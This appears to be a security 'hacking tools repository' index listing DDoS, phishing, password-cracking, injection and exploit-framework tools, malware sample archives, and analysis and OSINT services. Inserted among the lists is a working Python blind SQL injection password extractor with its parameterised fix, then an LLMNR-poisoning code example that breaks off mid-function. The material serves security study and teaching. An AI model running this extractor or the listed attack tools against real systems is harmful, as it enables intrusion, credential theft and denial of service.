Hacking Tools Repository

awjunaid


Connect With Me

💰 You can help me by Donating

BuyMeACoffee


Table of Content

Android Malware

Assembly Language

Introduction

Arithmetic and Logic

Memory and Registers

Symmetric Encryption

  • 3DES: A symmetric-key block cipher (Triple DES), which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.
  • AES: Symmetric-key block cipher algorithm, widely used for secure and classified data encryption (also known as Rijndael).
  • Blowfish: A symmetric-key block cipher designed in 1993 by Bruce Schneier, featuring key-dependent S-boxes and a complex key schedule.

Asymmetric Encryption

  • DH (Diffie-Hellman): A method for securely exchanging cryptographic keys over a public channel, enabling forward secrecy.
  • ECC (Elliptic Curve Cryptography): Public-key cryptosystems based on the algebraic structure of elliptic curves over finite fields.
  • RSA: One of the first practical public-key cryptosystems, widely used for secure data transmission.

Transform Encryption

Hash Functions

  • MD5: A widely used hash function producing a 128-bit hash value. It has known vulnerabilities but can still serve as a checksum for data integrity.
  • SHA1: A cryptographic hash function designed by the NSA, producing a 160-bit hash. It is no longer considered secure.
  • SHA2: A family of hash functions (including SHA-256 and SHA-512) providing stronger security than SHA-1.
  • SHA3: The SHA-3 family of hash functions, designed to resist quantum computer attacks and offering security properties such as collision resistance.

Books on Cryptography

DDoS Tools

  • DB2AMP: Exploits DB2 Amplification attacks.
  • Heartbleed: Leverages the Heartbleed vulnerability in OpenSSL for DDoS attacks.
  • MDNS: Targets mDNS (Multicast DNS) for amplification.
  • NETBIOS: Amplifies attacks using NETBIOS service.
  • NTP: Leverages the Network Time Protocol (NTP) for DDoS.
  • OVH: Targets OVH servers for massive traffic bursts.
  • SENTINEL: Specific tool for DDoS attacks.
  • SNMP: Uses Simple Network Management Protocol (SNMP) to amplify attacks.
  • SSDP: Exploits SSDP for amplification.
  • SYN: SYN flood attacks, often used in DoS (Denial of Service).
  • TS3: Targets TS3 servers for flooding.
  • UDP: A UDP-based DDoS attack tool.
  • XMLRPC: Exploits XML-RPC for attack amplification.

DDoS Tools (Code-Based)

  • ACK: ACK flood attack tool written in C.
  • ARME: ARME attack simulation in C.
  • CHARGEN: Exploits the CHARGEN service for DoS.
  • DNS: DNS-based DDoS tool in C.
  • DOMINATE: A tool for dominating targeted networks.
  • DRDOS: Distributed Reflection DoS (DRDoS) in Perl.
  • TELNET: Telnet flood attack simulation.
  • SUDP: UDP-based attack tool written in C.
  • STD: Another DoS tool written in C.
  • STCP: TCP-based DoS simulation tool in C.
  • SSYN: SYN flood attack with a slight modification.

Malware samples collected for analysis.

Malware Samples & Repositories

  • Clean MX: A real-time database of malware and malicious domains.
  • Contagio: A collection of recent malware samples and analyses.
  • Exploit Database: Provides exploit and shellcode samples.
  • Infosec - CERT-PA: Malware samples collection and analysis by CERT-PA.
  • InQuest Labs: An ever-growing searchable corpus of malicious Microsoft documents.
  • Javascript Malware Collection: Collection of over 40,000 javascript malware samples.
  • Malpedia: A resource providing rapid identification and actionable context for malware investigations.
  • Malshare: Large repository of malware actively scraped from malicious sites.
  • Ragpicker: Plugin-based malware crawler with pre-analysis and reporting functionalities.
  • theZoo: A collection of live malware samples for analysts.
  • Tracker h3x: Aggregator for malware corpus tracking and malicious download sites.
  • vduddu malware repo: Collection of various malware files and source code.
  • VirusBay: A community-based malware repository and social network.
  • ViruSign: Malware database detected by many anti-malware programs except ClamAV.
  • VirusShare: A malware repository, registration required for access.
  • VX Vault: An active collection of malware samples.
  • Zeltser's Sources: A curated list of malware sample sources compiled by Lenny Zeltser.
  • Zeus Source Code: Source code for the Zeus Trojan, leaked in 2011.
  • VX Underground: A massive and growing collection of free malware samples.

Other Resources

Threat intelligence and IOC resources.

Threat Intelligence Feeds & Blocklists

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents.

Malware Analysis Tools

  • AnalyzePDF: A tool to analyze PDF files and determine if they are malicious.
  • box-js: A tool to study JavaScript malware, with support for JScript/WScript and ActiveX emulation.
  • diStorm: A disassembler used for analyzing malicious shellcode.
  • InQuest Deep File Inspection: Tool for uploading common malware lures for deep inspection and heuristic analysis.
  • JS Beautifier: A tool to unpack and deobfuscate JavaScript code.
  • libemu: A library and tools for emulating x86 shellcode, useful for malware analysis.
  • malpdfobj: Tool for deconstructing malicious PDFs into a JSON representation.
  • OfficeMalScanner: A tool for scanning MS Office documents for malicious traces.
  • olevba: A script for parsing OLE and OpenXML documents to extract useful information, helpful for detecting embedded malware.
  • Origami PDF: Tool for analyzing malicious PDFs.
  • PDF Tools: Includes utilities like pdfid and pdf-parser for analyzing PDF files, developed by Didier Stevens.
  • PDF X-Ray Lite: A backend-free PDF analysis tool, lighter than the full version of PDF X-Ray.
  • peepdf: A Python tool for investigating possibly malicious PDFs.
  • QuickSand: A C-based framework for analyzing malware-laden documents, designed to identify exploits in encodings and extract embedded executables.
  • Spidermonkey: Mozilla's JavaScript engine, used for debugging and analyzing malicious JavaScript.

Network

Analyze network interactions.

Network Traffic Analysis and Malware Detection Tools

  • Bro (Zeek): A powerful network protocol analyzer, scalable for both file and network protocols, and highly used for network traffic analysis and security monitoring.
  • BroYara: Integration of Yara rules into Bro (Zeek), allowing for malware detection within network traffic.
  • CapTipper: Tool for exploring malicious HTTP traffic, used for traffic inspection and analysis.
  • chopshop: A framework designed for protocol analysis and decoding, useful for capturing and analyzing network traffic.
  • CloudShark: A web-based tool for packet analysis, providing an interface for examining network traffic and detecting malware.
  • FakeNet-NG: A next-gen dynamic network analysis tool, useful for malware analysis by emulating network services.
  • Fiddler: A web debugging proxy that intercepts HTTP and HTTPS traffic for analysis and troubleshooting.
  • Hale: A botnet C&C monitor, focused on analyzing command and control traffic.
  • Haka: Open-source security language for describing protocols and applying security policies to live captured traffic.
  • HTTPReplay: A library for parsing and extracting data from PCAP files, including TLS streams.
  • INetSim: A network service emulator, useful for setting up a malware lab and emulating services like HTTP, FTP, and DNS.
  • Laika BOSS: A file-centric malware analysis and intrusion detection system, analyzing file-based threats.
  • Malcolm: A full packet capture (PCAP) and Zeek log analysis tool suite for network traffic analysis.
  • Malcom: A malware communications analyzer, focused on detecting malicious network activity.
  • Maltrail: Malicious traffic detection system using blacklists of malicious IPs and domains with reporting and analysis capabilities.
  • mitmproxy: An intercepting proxy that allows users to inspect and modify network traffic in real-time.
  • Moloch: A large-scale IPv4 traffic capturing, indexing, and database system for packet analysis.
  • NetworkMiner: A network forensic analysis tool that helps in analyzing packet capture (PCAP) files, with a free version available.
  • ngrep: A network packet analyzer that allows users to search through network traffic using grep-like syntax.
  • PcapViz: A tool to visualize network traffic and topology from PCAP files.
  • Python ICAP Yara: An ICAP server with Yara scanning for content and URL analysis, often used for detecting malicious traffic.
  • Squidmagic: A tool designed for analyzing web-based network traffic to detect C&C servers and malicious sites using the Squid proxy server and Spamhaus.
  • Tcpdump: A widely used command-line tool for capturing and analyzing network traffic in real-time.
  • tcpick: A tool to track and reassemble TCP streams from network traffic.
  • tcpxtract: A tool that extracts files from network traffic.
  • Wireshark: The most popular network traffic analysis tool, capable of inspecting and analyzing various network protocols.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

Memory Forensics and Malware Analysis Tools

  • BlackLight: A forensics tool for Windows and macOS supporting analysis of hibernation files, pagefiles, and raw memory. Useful for conducting deep memory analysis on systems.
  • DAMM: Differential analysis of malware in memory using Volatility. This tool helps to detect and compare changes in memory states before and after malware execution.
  • evolve: A web interface for the Volatility Memory Forensics Framework, allowing for easier analysis and reporting.
  • FindAES: A tool that helps identify AES encryption keys within memory dumps, which is useful for decrypting malware or analyzing encrypted data in memory.
  • inVtero.net: A high-speed memory analysis framework developed in .NET for Windows x64, providing support for code integrity checks and memory writes.
  • Muninn: Automates portions of memory analysis using Volatility, generating readable reports of the findings.
  • Orochi: An open-source framework that supports collaborative forensic memory dump analysis, designed for use in team environments.
  • Rekall: A memory forensics framework that was forked from Volatility in 2013, widely used for memory analysis and incident response.
  • TotalRecall: A script based on Volatility, designed to automate various tasks in malware analysis and memory forensics.
  • VolDiff: A tool for running Volatility on memory images taken before and after malware execution, highlighting changes in memory that could indicate malicious activity.
  • Volatility: One of the most advanced and widely used memory forensics frameworks. It provides powerful tools for analyzing memory dumps, detecting malware, and uncovering forensic evidence.
  • VolUtility: A web interface for the Volatility Memory Analysis framework, simplifying its use and visualization of memory analysis results.
  • WDBGARK: A WinDBG extension specifically for detecting rootkits, aiding in live memory inspection for malicious activities.
  • WinDbg: A debugger for live memory inspection and kernel debugging, often used for in-depth system analysis and reverse engineering malware.

Malware Analysis & Reverse Engineering Books

Cheat Sheets/Tables

  • IDA Cheat Sheet: A quick reference for frequently used IDA Pro commands and shortcuts.
  • Cheat Sheets: Various IT and cybersecurity-related cheat sheets, from networking to reverse engineering.
  • File Signatures: A comprehensive list of file signatures for identifying file types.
  • APT Groups and Operations: Detailed spreadsheet tracking Advanced Persistent Threat (APT) groups and their operations.
  • Ransomware Overview: Catalog of ransomware families, including indicators of compromise and behavior.
  • Intel Assembler Code Table: Instruction set reference for Intel assembly language.
  • ARM Assembly Cheatsheet: A quick guide to basic ARM assembly instructions.
  • APTnotes: Repository of publicly available documents related to APT activities.
  • PE 101: Illustrated guide to the Portable Executable (PE) file format.
  • PDF 101: A deep dive into the structure and quirks of PDF files.
  • PDF Analysis: Tools and techniques for analyzing PDF documents.
  • Digital Forensics and Incident Response: Comprehensive DFIR cheat sheet covering common tools and methodologies.

Decoders

  • CyberChef: A web-based tool for encoding, decoding, and analyzing data.
  • KevtheHermit RAT Decoders: Scripts for decoding configurations from various Remote Access Trojans (RATs).

Debuggers

  • OllyDbg: A 32-bit assembler-level debugger for Windows.
  • Immunity Debugger: A powerful debugger geared toward exploit development.
  • X64dbg: An open-source x64/x32 debugger for Windows.
  • Rvmi: Remote debugger for virtual machine introspection.
  • WinDBG: Microsoft’s debugger for Windows development and analysis.

Disassemblers

  • IDA Pro: Industry-standard interactive disassembler for reverse engineering.
  • Binary Ninja: A modern binary analysis platform with a focus on usability.
  • Radare2: Open-source framework for reverse engineering.
  • Cutter: A GUI frontend for Radare2.
  • BinNavi: Binary analysis IDE for exploring code and data structures.
  • Hopper: A macOS/Linux-based disassembler with decompilation features.
  • Medusa: Open-source disassembler with a focus on simplicity.
  • Disassembler.io: Free online disassembler for quick binary analysis.
  • Ghidra: NSA-developed reverse engineering tool with extensive features.

Static Analysis Tools

  • PEiD: Detects packers, cryptors, and compilers in PE files.
  • McAfee FileInsight: Hex editor with scripting capabilities for analyzing malware.
  • HashMyFiles: Generates file hashes for comparison and verification.
  • CFF Explorer: PE file editor with advanced analysis tools.
  • AnalyzePESig: Tool for identifying suspicious digital signatures in PE files.
  • ByteHist: Visualizes byte-level distribution in binary files.
  • Exeinfo: Provides detailed metadata for PE files.
  • Scylla: Imports reconstruction tool for analyzing dumped PE files.
  • MASTIFF: Automates static analysis of malware.
  • PEframe: Framework for analyzing PE files for malware indicators.
  • PEscan: Scans PE files for suspicious characteristics.
  • PEstudio: Tool for analyzing PE files, detecting anomalies, and unpacking.
  • PE-Bear: PE file reverse-engineering tool.
  • PE-sieve: Detects and dumps in-memory PE modifications.
  • Flare-Floss: Automatically extracts obfuscated strings from malware.
  • PatchDiff2: Binary diffing tool for comparing patched/unpatched binaries.
  • PE Insider: Comprehensive PE file analysis toolkit.
  • Resource Hacker: Editor for viewing, editing, and extracting resources in executables.
  • DarunGrim: Tool for binary diffing and similarity analysis.
  • Mal Tindex: Malware indexing and classification tool.
  • Manalyze: Framework for static analysis of PE files.
  • PDBlaster: Generates PDB files for stripped binaries.
  • ImpFuzzy: Calculates fuzzy hashes based on imports for similarity analysis.
  • Florentino: Static analysis tool focused on script and malware detection.
  • Viper: A versatile platform for managing and analyzing malware samples.

Text/Hex Editor Tools

  • Notepad++: A powerful text editor with support for syntax highlighting and plugins.
  • 010 Editor: A professional-grade hex editor with binary templates for file parsing.
  • HxD: A fast hex editor, disk editor, and RAM editor for Windows.
  • BinText: A tool to extract readable ASCII and Unicode strings from binary files.
  • Hexinator: A hex editor with advanced analysis and reverse engineering capabilities.

Threat Intelligence

  • ThreatMiner: A threat intelligence platform for analyzing malware, domains, and other artifacts.
  • RiskIQ Community: Platform for exploring internet threats and analyzing malicious activity.
  • PasteBin: Often used for data leaks and shared threat intelligence.
  • Shodan: A search engine for internet-connected devices, including vulnerable systems.
  • Censys: Internet-wide scanning and analysis tool for finding exposed systems.
  • DNSdumpster: A domain research tool for identifying DNS records and subdomains.
  • URLHaus: A database of malicious URLs used in malware campaigns.
  • AlienVault OTX: Open Threat Exchange for collaborative threat intelligence sharing.
  • C2 Tracker: Tracks command and control (C2) infrastructure used by malware.
  • MISP: Malware Information Sharing Platform for sharing threat intelligence.
  • The Hive: Incident response platform with collaborative features.
  • Yeti: Your Everyday Threat Intelligence tool for managing and enriching indicators.
  • Using ATT&CK for CTI Training: MITRE ATT&CK-based training for Cyber Threat Intelligence (CTI).
  • PasteScraper: Automates scraping of PasteBin and similar sites for threat intelligence.

OSINT Tools

Server & Network Tools

  • Shodan: Search engine for discovering internet-connected devices.
  • Onyphe: A cyber defense search engine for gathering internet-facing threat data.
  • Censys: Maps the internet for open ports, vulnerabilities, and services.
  • Ivre: Network recon and intrusion detection framework.
  • BGPView: Tool for exploring internet routing and BGP data.
  • DNSDumpster: A tool for DNS and subdomain reconnaissance.
  • CertStream: Monitors real-time Certificate Transparency logs for new domain certificates.
  • Exploit Observer: Tracks known exploits across the internet.
  • Subdomain Center: Automated subdomain enumeration service.
  • Malcore: Malware scanning and threat analysis platform.
  • SearchCode: Source code search engine for vulnerability hunting.
  • Internet Intelligence: Monitors exposed services, devices, and vulnerabilities.
  • Criminal IP: Threat intelligence platform focused on vulnerabilities and threat hunting.
  • GreyNoise: Provides context about internet-wide noise and non-malicious scans.
  • Arkham Intelligence: Tracks on-chain crypto assets and related threat activities.
  • WhatsMyName: OSINT username enumeration tool.
  • DeHashed: Search engine for breached data and credentials.
  • WhiteIntel: Platform for analyzing threat actor activities.
  • ManyPasswords: Repository of common password lists for brute-forcing.
  • DNS History: Historical DNS records lookup tool.
  • Global Terrorism Catalogue: Dataset tracking global terrorism events.
  • Public Intelligence: Repository of government and security-related documents.
  • CINS Army: List of known malicious IPs for threat analysis.
  • Umbrella List: Cisco Umbrella threat intelligence database.
  • Malware Bazaar: Repository of malware samples and associated indicators.
  • War on the Rocks: Articles on cybersecurity, geopolitics, and military strategy.
  • IntelligenceX: Advanced search engine for public and dark web content.
  • Counter Extremism: Information on extremist organizations and countermeasures.
  • MITRE ATT&CK: Knowledge base of adversary tactics, techniques, and procedures (TTPs).
  • Exploit Alert: A platform tracking active exploits in the wild.

Search & Intelligence Tools

  • Google: Popular search engine for OSINT and general queries.
  • IntelX: Advanced search engine for public and dark web data.
  • URLScan: Scans and visualizes website interactions for analysis.
  • PublicWWW: Search engine for website source codes.
  • Searchcode: Source code search engine for vulnerabilities and patterns.
  • Grep.app: Tool to search open-source code repositories.
  • Onion Search Engine: Specialized search for .onion sites on the dark web.
  • Archive.org: Internet Archive for accessing historical versions of web pages.
  • Spyonweb: Tool to investigate domains by IP addresses or analytics codes.

Threat Intelligence Tools

  • BinaryEdge: Platform for internet-wide scanning and monitoring.
  • FOFA: Tool for fingerprinting and asset discovery across the internet.
  • ZoomEye: Search engine for discovering networked devices and vulnerabilities.
  • LeakIX: Tracks exposed databases and other leaks online.
  • GreyNoise: Provides context for background internet noise and scans.
  • Pulsedive: Platform for enriching and visualizing threat intelligence indicators.
  • ThreatCrowd: Tool for investigating domains, IPs, and file hashes.
  • ThreatMiner: Threat analysis tool for malware, domains, and IPs.
  • SOC Radar: Threat intelligence and attack surface monitoring tool.

Vulnerability & Malware Tools

  • Vulners: Searchable database of vulnerabilities and exploits.
  • VulDB: Vulnerability database and advisory platform.
  • CVE Mitre: Comprehensive resource for Common Vulnerabilities and Exposures (CVEs).
  • Hybrid Analysis: Malware analysis platform with sandbox features.
  • MalShare: Repository for malware samples and analysis.

Email & Communication Tools

  • Hunter.io: Finds email addresses associated with a domain.
  • Have I Been Pwned: Checks if your email or phone has been part of a data breach.
  • PassiveTotal: Provides domain and IP intelligence for threat hunting.

Wi-Fi & Network Mapping Tools

  • WiGLE: Maps Wi-Fi networks and associated geolocations.

Attack Surface Management Tools

  • Netlas: Monitors exposed assets and provides internet-wide search capabilities.
  • FullHunt: Platform for attack surface and vulnerability management.
  • BinaryEdge: Also listed in threat intelligence, focuses on internet-wide scanning and monitoring.

Penetration Testing

Subdomain

  • subDomainsBrute - A fast sub domain brute tool for pentesters
  • ksubdomain - Subdomain enumeration tool, asynchronous dns packets, use pcap to scan 1600,000 subdomains in 1 second
  • Sublist3r - Fast subdomains enumeration tool for penetration testers
  • OneForAll - OneForAll is a powerful subdomain integration tool
  • LayerDomainFinder - a subdomains enumeration tool by Layer
  • ct - Collect information tools about the target domain.
  • Subfinder - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
  • Probable_subdomains - Subdomains analysis and generation tool. Reveal the hidden!
    • domains - Generate subdomains and wordlists Online.
  • MassDNS - High-performance DNS stub resolver targeting those who seek to resolve a massive amount of domain names in the order of millions or even billions.
  • altdns - Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
  • dnscan - Fast and lightweight dns bruteforcer with built-in wordlist and zone transfer checks.

Google Hacking

  • GHDB - Google Hack Database
  • SearchDiggity - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project
  • Katana - A Python Tool For google Hacking
  • GooFuzz - GooFuzz is a tool to perform fuzzing with an OSINT approach, managing to enumerate directories, files, subdomains or parameters without leaving evidence on the target's server and by means of advanced Google searches (Google Dorking).
  • Pagodo - pagodo (Passive Google Dork) automates Google Hacking Database scraping and searching.
  • Google-Dorks - Useful Google Dorks for WebSecurity and Bug Bounty

Github

  • GitHacker - A Git source leak exploit tool that restores the entire Git repository, including data from stash, for white-box auditing and analysis of developers' mind.
  • GitGraber - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services.
  • GitMiner - Tool for advanced mining for content on Github.
  • Gitrob - Reconnaissance tool for GitHub organizations.
  • GitGot - Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
  • GitDump - A pentesting tool that dumps the source code from .git even when the directory traversal is disabled

Port Scan

  • Nmap | Zenmap - Free and open source utility for network discovery and security auditing
  • Masscan - TCP port scanner, spews SYN packets asynchronously
  • Ports - Common service ports and exploitations
  • Goby - Attack surface mapping
  • Goscan - Interactive Network Scanner
  • NimScan - Fast Port Scanner
  • RustScan - The Modern Port Scanner
  • TXPortMap - Port Scanner & Banner Identify From TianXiang
  • Scaninfo - fast scan for redtools
  • SX - Fast, modern, easy-to-use network scanner
  • Yujianportscan - A fast port scanner GUI tool built with VB.NET and IOCP
  • Naabu - A fast port scanner written in go with a focus on reliability and simplicity.

Phishing

  • gophish - Open-Source Phishing Toolkit
  • AdvPhishing - Advanced phishing tool with OTP phishing support
  • SocialFish - Educational Phishing Tool & Information Collector
  • Zphisher - An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
  • Nexphisher - Advanced Phishing tool for Linux & Termux

Vulnerability Scanner

  • Struts-Scan - Struts2 vulnerability detection and utilization tools
  • Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items
  • W3af - Web application attack and audit framework, the open source web vulnerability scanner
  • Openvas - The world's most advanced Open Source vulnerability scanner and manager
  • Archery - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities
  • Taipan - Web application vulnerability scanner
  • Arachni - Web Application Security Scanner Framework
  • Nuclei - Fast and customizable vulnerability scanner based on simple YAML based DSL.
  • Xray - A passive-vulnerability-scanner Tool.
  • Super-Xray - Web Vulnerability Scanner XRAY GUI Starter
  • SiteScan - AllinOne Website Information Gathering Tools for pentest.
  • Banli - High-risk asset identification and high-risk vulnerability scanner.
  • vscan - Open Source Vulnerability Scanner.
  • Wapiti - Web vulnerability scanner written in Python3.
  • Scaninfo - fast scan for redtools
  • osv-scanner - Vulnerability scanner written in Go which uses the data provided by https://osv.dev
  • Afrog - A Vulnerability Scanning Tools For Penetration Testing
  • OpalOPC - A vulnerability and misconfiguration scanner for OPC UA applications

CMS & Framework Identification

  • AngelSword - CMS vulnerability detection framework
  • WhatWeb - Next generation web scanner
  • Wappalyzer - Cross-platform utility that uncovers the technologies used on websites
  • Whatruns - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome)
  • WhatCMS - CMS Detection and Exploit Kit based on Whatcms.org API
  • CMSeeK - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs
  • EHole - CMS Detection for RedTeam
  • ObserverWard - Cross platform community web fingerprint identification tool
  • Yunsee - Online service for finding a site's CMS footprint
  • Bugscaner - A simple online fingerprint identification system that recognizes hundreds of CMS source code bases
  • WhatCMS online - CMS Detection and Exploit Kit website Whatcms.org
  • TideFinger - Fingerprinter Tool from TideSec Team
  • 360finger-p - Fingerprinter Tool from 360 Team

Web Applications Proxies

  • Burpsuite - Burpsuite is a graphical tool for testing Web application security
  • ZAP - One of the world's most popular free security tools
  • Mitmproxy - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Broxy - An HTTP/HTTPS intercept proxy written in Go.
  • Hetty - An HTTP toolkit for security research.
  • Proxify - Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.

Web Crawlers & Directory Brute Force

  • Dirbrute - Multi-threaded web directory brute-forcing tool (with built-in dictionaries)
  • Dirb - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses.
  • ffuf - Fast web fuzzer written in Go.
  • Dirbuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
  • Dirsearch - Web path scanner.
  • Gobuster - Directory/File, DNS and VHost busting tool written in Go.
  • WebPathBrute - Web path Bruter.
  • wfuzz - Web application fuzzer
  • Dirmap - An advanced web directory & file scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian.
  • YJdirscan - Yujian dirscan Gui Pro

Docker Scanners

  • Fuxi-Scanner - open source network security vulnerability scanner, it comes with multiple functions.
  • Xunfeng - A rapid emergency response and cruise scanning system for enterprise intranets.
  • WebMap - Nmap Web Dashboard and Reporting.
  • Pentest-Collaboration-Framework - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing!

Password Attacks

  • Hydra - Hydra is a parallelized login cracker which supports numerous protocols to attack
  • Medusa - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer
  • Sparta - Network Infrastructure Penetration Testing Tool.
  • Hashcat - World's fastest and most advanced password recovery utility
  • Patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
  • HackBrowserDat - Decrypt passwords/cookies/history/bookmarks from the browser
  • John - John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.
  • crowbar - brute forcing tool that can be used during penetration tests. Supports OpenVPN, RDP (with NLA), ssh and VNC.

Wordlists

  • wordlists - Real-world infosec wordlists, updated regularly
  • psudohash - Password list generator that focuses on keywords mutated by commonly used password creation patterns
  • wister - A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.
  • Rockyou - wordlists packaging for Kali Linux.
  • Weakpass - Wordlists for any kind of brute-force attack.

Wireless Tools

  • Fern Wifi cracker - Fern-Wifi-Cracker is designed for testing and discovering flaws in one's own network with the aim of fixing the flaws detected
  • EAPHammer - EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks.
  • Wifite2 - Wifite is designed to use all known methods for retrieving the password of a wireless access point.
  • JackIt - Implementation of Bastille's MouseJack exploit. Easy entry point through wireless keyboards and mice during red team engagements.

Cross-site Scripting (XSS)

  • BeeF - The Browser Exploitation Framework Project
  • BlueLotus_XSSReceiver - XSS Receiver platform without SQL
  • XSStrike - Most advanced XSS scanner.
  • xssor2 - XSS'OR - Hack with JavaScript.
  • Xsser-Varbaek - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras
  • Xsser-Epsylon - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
  • Xenotix - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework
  • PwnXSS - XSS vulnerability scanner and exploitation tool.
  • dalfox - DalFox is a powerful open-source XSS scanner and parameter analysis utility.
  • ezXSS - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.

Sql Injection

  • Sqlmap - Automatic SQL injection and database takeover tool
  • SSQLInjection - SQL injection tool supporting Access, MySQL, SQL Server, Oracle, PostgreSQL, DB2, SQLite and Informix databases.
  • Jsql-injection - jSQL Injection is a Java application for automatic SQL database injection.
  • NoSQLMap - Automated NoSQL database enumeration and web application exploitation tool.
  • Sqlmate - A companion to sqlmap that adds the features you always expected from it.
  • SQLiScanner - Automatic SQL injection using the Charles proxy together with the sqlmap API.
  • sql-injection-payload-list - SQL Injection Payload List
  • Advanced-SQL-Injection-Cheatsheet - A cheat sheet that contains advanced queries for SQL Injection of all types.
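The tools above automate what is, at bottom, a small algorithm. The following added example (not code from this repository or from sqlmap or any other listed project) shows a boolean-based blind injection of the kind the lab entries further down practise: a vulnerable lookup that concatenates input into SQL, the same lookup with a bound parameter, and an extraction routine that recovers a password character by character from nothing but the yes/no answer. The schema, the rows and the SQLite in-memory database are constructed for the demo; `unicode()` and `substr()` are SQLite built-ins, so the probe strings would need adjusting for another engine.

```python
import sqlite3


def build_db():
    """Constructed sample database with one privileged account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("guest", "guest")],
    )
    return conn


def user_exists_vulnerable(conn, username):
    """VULNERABLE: user input is concatenated into the statement text.

    The application reveals only a yes/no answer, which is exactly the
    boolean oracle a blind injection needs.
    """
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn, username):
    """FIXED: a bound parameter keeps the input as data, never as SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def blind_extract_password(oracle, target_user, max_len=64):
    """Recover target_user's password one character at a time.

    oracle(username_input) must return True when the injected condition holds.
    Each character is found by binary search over printable ASCII (32..126),
    comparing code points with SQLite's unicode(substr(...)).
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the password has no character at this position.
        if not oracle(f"{target_user}' AND length(password) >= {pos} AND '1'='1"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{target_user}' AND unicode(substr(password,{pos},1)) > {mid} AND '1'='1"
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", blind_extract_password(lambda u: user_exists_vulnerable(conn, u), "admin"))
    print("fixed:     ", repr(blind_extract_password(lambda u: user_exists_fixed(conn, u), "admin")))
```

Against the fixed function every probe is just a username that does not exist, so the loop exits on the first length check with an empty result. Each recovered character costs about seven requests (log2 of the 95-character range), which is why blind extraction is slow but entirely practical, and why the cure is the parameter binding rather than any filtering of the input string.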

Exploit Framework

  • POC-T - Pentest Over Concurrent Toolkit
  • Pocsuite3 - pocsuite3 is an open-source remote vulnerability testing framework developed by the Knownsec 404 Team.
  • Metasploit - The world’s most used penetration testing framework
  • Venom - Shellcode generator/compiler/handler (metasploit)
  • Empire - Empire is a PowerShell and Python post-exploitation agent
  • Starkiller - Starkiller is a Frontend for PowerShell Empire.
  • Koadic - Koadic C3 COM Command & Control - JScript RAT
  • Viper - A UI manager for metasploit-framework.
  • MSFvenom-gui - GUI tool for creating standard payloads with msfvenom.
  • MYExploit - A GUI tool for scanning OA (office automation software) vulnerabilities.
  • ronin-exploits - A Ruby micro-framework for writing and running exploits and payloads.

Sniffing & Spoofing

  • Wireshark - Wireshark is a cross-platform network protocol analyzer, or "sniffer".
  • Cain & Abel - Cain & Abel is a password recovery tool for Microsoft operating systems.
  • Responder - Responder is an LLMNR, NBT-NS and MDNS poisoner.
  • bettercap - ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks
  • EvilFOCA - Evil Foca is a tool for pentesters and security auditors for testing the security of IPv4 and IPv6 data networks.
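Responder's core trick is simpler than its feature list suggests: it listens on the multicast group and answers every LLMNR name query with its own address, copying the victim's transaction ID so the reply is accepted. The added example below (not Responder's code, nor anything from this repository) shows both sides of that exchange at the byte level, plus the canary check defenders use to spot a poisoner. The transaction IDs, the queried name `fileshare01` and the attacker address `10.0.0.66` are constructed values; the packet layout follows the DNS-style header and question/answer records that LLMNR reuses (UDP 5355, multicast 224.0.0.252).

```python
import struct

LLMNR_PORT = 5355            # LLMNR runs over UDP port 5355
LLMNR_MCAST = "224.0.0.252"  # IPv4 multicast group that Windows hosts query
QR_BIT = 0x8000              # header flag that distinguishes a response from a query


def encode_name(name):
    """DNS-style label encoding: length byte + label, terminated by a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def decode_name(data, offset):
    """Inverse of encode_name; returns (name, offset just past the terminator)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
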